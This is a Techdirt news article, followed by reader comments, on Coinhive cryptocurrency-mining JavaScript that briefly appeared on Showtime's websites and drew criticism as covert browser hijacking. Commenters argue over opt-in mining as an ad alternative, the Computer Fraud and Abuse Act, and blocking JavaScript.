Showtime Won't Explain Why Its Website Was Hijacking User Browsers To Covertly Mine Cryptocurrency
from the whoops-a-daisy dept
Showtime's websites recently began covertly hijacking user browsers to mine cryptocurrency, and neither Showtime nor its parent company CBS appear interested in explaining how or why it happened. The code in question -- a bit of JavaScript dubbed Coinhive, was embedded in two different Showtime domains: Showtime.com and Showtimeanytime.com. When a visitor visited these domains, their browser was hijacked and their computer was forced to help mine Monero, a new privacy-centric alternative to bitcoin currently valued at around $92 each.
The mining software was first noticed by a Twitter user who discovered the Coinhive miner buried early on in the source code:
@briankrebs https://t.co/fnk275wEj9 has a Cryptocurrency miner in the source code pic.twitter.com/XE80sMRJVe
— SkensNet (@skensnet) September 23, 2017
Users weren't alerted that this was happening, and visitors reportedly found the mining software utilized up to 80% of a visiting user's CPU cycles. Such miners can also notably drain battery life for visitors on mobile devices. And as of this writing, Showtime has been completely unwilling to confirm that this occurred, much less explain how the code appeared. The company has refused to respond to numerous requests for comment from a myriad of websites, Techdirt included. The code appeared in the evening of September 23, and had disappeared by the next Monday morning.
It seems relatively unlikely that executives or developers at Showtime thought it would be a good idea to hijack the browsers of potential customers to mine cryptocurrency, leading many to believe that Showtime's servers were likely hacked by somebody looking to covertly make a little extra money:
"The JavaScript, which appeared on the sites at the start of the weekend and vanished by Monday, sits between HTML comment tags that appear to be an insert from web analytics biz New Relic. Again, it is unlikely that an analytics company would deliberately stash coin-mining scripts onto its customers' pages, so the code must have come from another source – or was injected by miscreants who had compromised Showtime's systems."
That said, it's not impossible that Showtime was running an experiment. Cryptocurrency miners have been making headlines in recent weeks after The Pirate Bay was caught also covertly using Coinhive to hijack visitor browsers to make extra bank. Coinhive only just launched September 14, advertising itself as a creative alternative to the traditional advertising model. But after users over at the Pirate Bay subreddit discovered the practice and began to complain, the website was forced to pull the software from its code and issued a relatively flimsy mea culpa:
"As you may have noticed we are testing a Monero javascript miner. This is only a test. We really want to get rid of all the ads. But we also need enough money to keep the site running."
Except covertly hijacking a browser with glorified malware obviously isn't a great way of "keeping a site running," especially if websites running to embrace Coinhive refuse to let users opt out -- much less inform them this is even happening. Not surprisingly, the recent rise in such stealth cryptocurrency miners has resulted in Adblock Plus moving to help block such hijacks. Malwarebytes analyst Jérôme Segura warns in a blog post that some websites appear unsurprisingly intent on "pushing the limits towards a really bad user experience":
"Gaming and video sites typically are more resource intensive, so it seems to make little sense to run a miner at the same time without having a noted impact. Having said that, many people who consume copyrighted content are perhaps less likely to complain about an under par user experience. The question at this point is: How far can publishers push the limits towards a really bad user experience? You may be surprised that for many, this is not really a problem at all and that double dipping is, in fact, a fairly common practice."
Again, there are creative alternatives to advertising, and then there's just being an asshole. Hijacking a visitor's browser, CPU and electricity to mine cryptocurrency without informing them -- or letting them opt out -- sits firmly in the latter category.
Thank you for reading this Techdirt post. With so many things competing for everyone’s attention these days, we really appreciate you giving us your time. We work hard every day to put quality content out there for our community.
Techdirt is one of the few remaining truly independent media outlets. We do not have a giant corporation behind us, and we rely heavily on our community to support us, in an age when advertisers are increasingly uninterested in sponsoring small, independent sites — especially a site like ours that is unwilling to pull punches in its reporting and analysis.
While other websites have resorted to paywalls, registration requirements, and increasingly annoying/intrusive advertising, we have always kept Techdirt open and available to anyone. But in order to continue doing so, we need your support. We offer a variety of ways for our readers to support us, from direct donations to special subscriptions and cool merchandise — and every little bit helps. Thank you.
–The Techdirt Team
Filed Under: coinhive, hijacking, javascript, monero, showtime
Companies: cbs, showtime
Reader Comments
Subscribe: RSS
View by: Time | Thread
Interesting idea though
What if you ran a site and just had clean banner at the top politely asking people to please run the miner to support you? It could actually be a good alternative to ads... So long as it is done clearly upfront and Opt-in only.
[ link to this | view in chronology ]
Re: Interesting idea though
It is is not shady, spying, controlling, or domineering... they are not interested!
[ link to this | view in chronology ]
Re: Interesting idea though
[ link to this | view in chronology ]
Re: Re: Interesting idea though
But they'd have to inform me upfront, provide an alternative, and the experience has to be positive (none of this buffering and dropping connections crap).
[ link to this | view in chronology ]
Re: Interesting idea though
I'd like to see the math on that and compare it to ad revenue. Would it be more? Less? Equal to?
I loath ads with every fiber of my being. But I would definitely volunteer some CPU time during my visits.
[ link to this | view in chronology ]
Re: Re: Interesting idea though
[ link to this | view in chronology ]
Re: Interesting idea though
https://venturebeat.com/2014/02/12/new-jersey-slaps-mit-bitcoin-hackers-with-subpoena-and-theyre-fig hting-back/
[ link to this | view in chronology ]
Re: Re: Interesting idea though
Any website that runs code that performs work to consume resources at the expense of the consumer, especially without any notice/permission, is against the CFAA.
As a user I expect to pay for the electricity and my costs to connect to the infrastructure and to consume bandwidth to display/interact with the services that a website is offering. The moment they start consuming any of my resources to make them money without first obtaining explicit permission then they are criminally liable for every watt my CPU consumes crunching their code!
I am okay with this replacing ads, but only as long as I am notified that my machine is now being used like this and given a choice to participate or not!
It should be illegal for a website to require someone to allow their computer to become a botnet, even it temporary, to consume a website!
[ link to this | view in chronology ]
Re: Re: Re: Interesting idea though
This has the makings of a very entertaining slippery slope. Suppose a website could lay out its content properly, as a static page on the server, which is then sent verbatim to clients; or they could indulge their JavaScript addiction and make the client do all the work laying out the page. The latter will be slightly more CPU efficient for the server (although globally much less efficient since each client would perform the work independently, rather than asking the server to do it once), thus saving them money by requiring the client to perform extra work to use the page. Frequently, such client-side rendered pages are at best equivalent, and usually far worse, user experience than doing it properly on the server (hence satisfying your "at the expense of the consumer"). Would that rise to a CFAA claim under your standard? It feels like it shouldn't, but it'd be greatly entertaining if it did, because then most Javascript addicted sites could be chased for CFAA. :D
[ link to this | view in chronology ]
Re: Re: Re: Re: Interesting idea though
If this is a CFAA violation (which I highly doubt), then a large percentage (probably 70+% of companies) are in violation.
BTW, "asking the server to do it once" is mostly incorrect except on the simplest web pages because injecting any amount of personalization into a page requires the server to render the page for each user.
[ link to this | view in chronology ]
Re: Re: Re: Re: Re: Interesting idea though
What would happen if the unnecessary activity initiated by the website visited by a user who is not aware of said activity ... were to be found illegal? Who is responsible? How does said user defend against this?
[ link to this | view in chronology ]
Re: Re: Re: Re: Re: Interesting idea though
Remember, CFAA explicitly states that any usage of a computer that gains access without authorization or attempts to perform a task that exceeds current authorization is abuse.
A website running code to perform its function for serving up content is legit for the obvious reasons. However, the point where the code is now executing something that is "not useful" to that purpose means they exceeded authorization.
Just visiting a page is NOT authorization to just run any code on the visiting machine.
I think the problem here is that once again, we allow companies too much latitude in what they do, just throwing the doors wide open until the abuse is TOO obvious to the point where pretzel logic cannot defend it. This is what created the problem of IoT vulnerability.
Imagine if a store asked all of its customers to process a mathematical equation when they enter the door or face getting kicked out. The more we allow this to continue, the more slippery that slope gets.
[ link to this | view in chronology ]
Re: Re: Re: Re: Re: Interesting idea though
Actually, my experience has been that they render the HTML exactly zero times, then send a blob of Javascript to the client to construct the page. That's what causes them to be so utterly broken for users who wisely block Javascript. If they did it right, the Javascript would be a progressive enhancement on top of an already usable page. Most sites instead do it dead wrong and make the page totally unusable unless you pull in untrusted scripts from half a dozen different servers.
Personally, I never authorize any site I visit to run Javascript on my computer. Under the frequently twisted interpretation of the CFAA, since I don't want it to happen, and yet it happens, it must be a CFAA violation. ;)
I know. I can dream though.
Sure, personalization requires customization. That's obvious. But how often are personalized pages actually necessary when viewing content that is functionally identical across all users (e.g. listing of current news or thread titles in a forum)? There are way too many sites that have decided that everything that could possibly be personalized must be, whether or not it makes any sense.
[ link to this | view in chronology ]
Re: Re: Re: Interesting idea though
[ link to this | view in chronology ]
Re: Interesting idea though
"We've turned this on guys, please do it" is no less acceptable than "...."
That's a "please help us fix business model problems and oh give us more $$"
[ link to this | view in chronology ]
Re: Interesting idea though
What would happen if all 10 of those sites tried to make my computer mine crypto-currency for them?
Even the best computers would probably choke and crash under that onslaught.
Or the computer's anti-virus would start alerting the user like crazy that someone's trying to inject malware on your computer.
[ link to this | view in chronology ]
[ link to this | view in chronology ]
Re:
[ link to this | view in chronology ]
Re: Re:
JS is a well known vector for malware, many times embedded in ads.
[ link to this | view in chronology ]
Re: Re: Re:
[ link to this | view in chronology ]
Re: Re: Re: Re:
Been using javascript blocking for years. In the early days I'd have JS disabled entirely in the browser, then used addons that added a button to disable/enable it, then later ones that allowed per-site, then still later the more advanced ones like noscript, policeman, umatrix, and so on that allow blocking not just on the site, but subdomains, cross-site, and so on.
[ link to this | view in chronology ]
Re:
I think i've seen Mike link to sites that don't work without JS. He must have it enabled. But I don't and Techdirt still works. Lots of sites haven't tested obviously--sometimes the pages are just blank or "links" don't work, sometimes you get an "enable javascript" message (don't--it only encourages them).
[ link to this | view in chronology ]
Re: Re:
If you're using Firefox, oftentimes you can click the book icon next to the URL bar and magically the words appear.
[ link to this | view in chronology ]
Re: Re: Re:
[ link to this | view in chronology ]
I'd love to see the disclaimer for this in the future...
Also something something tracking cookies
[[I Accept]]"
[ link to this | view in chronology ]
What if this was done to a user....
[ link to this | view in chronology ]
Re: What if this was done to a user....
[ link to this | view in chronology ]
Re: Re: What if this was done to a user....
If you're mining it obviously you intend on 'using' it in some way when you sell it/spend it later.
[ link to this | view in chronology ]
[ link to this | view in chronology ]
If they're going to abuse technology to steal from us, what's wrong with us doing it to them?
[ link to this | view in chronology ]
Re:
[ link to this | view in chronology ]
[ link to this | view in chronology ]
[ link to this | view in chronology ]
[ link to this | view in chronology ]
[ link to this | view in chronology ]
Get used to it
It is called EME in combination with DMCA 1201. See https://boingboing.net/2017/09/18/antifeatures-for-all.html
Once the corporate overlords understand the process it will be everywhere.
Maybe then there will be some political pushback.
[ link to this | view in chronology ]
Re: Get used to it
[ link to this | view in chronology ]
Who started this issue recently? The Pirate Bay. Didn't read any outraged comments then, even when they were running a miner that would knock your cpu usage to 100%.
Ahh, the double standards!
[ link to this | view in chronology ]
Re:
All along you are saying "the legacy industry should learn from piracy". Now they do, and you are upset.
A statement as stupid as 'You were complaining that the restaurant didn't have good food, and now that they've taken to adding a $20 charge to the bill because screw you you're upset?'
Or how about 'People were complaining that movies were too expensive, and now that they've decided to just download them for free you're upset', would you accept that as valid?
Assuming it was done by the ones running the site itself(possible, and their refusal to explain anything certainly isn't helping) then 'Ads aren't bringing in as much, let's hijack our visitor's system resources' is not a valid response, whereas being upset about a site serving up malware most certainly is.
Whether or not The Pirate Bay did something similar is besides the point, it wasn't acceptable then, and it's not acceptable now, so once again your attempt at a 'Gotcha' falls flat.
[ link to this | view in chronology ]
Re:
[ link to this | view in chronology ]
[ link to this | view in chronology ]
[ link to this | view in chronology ]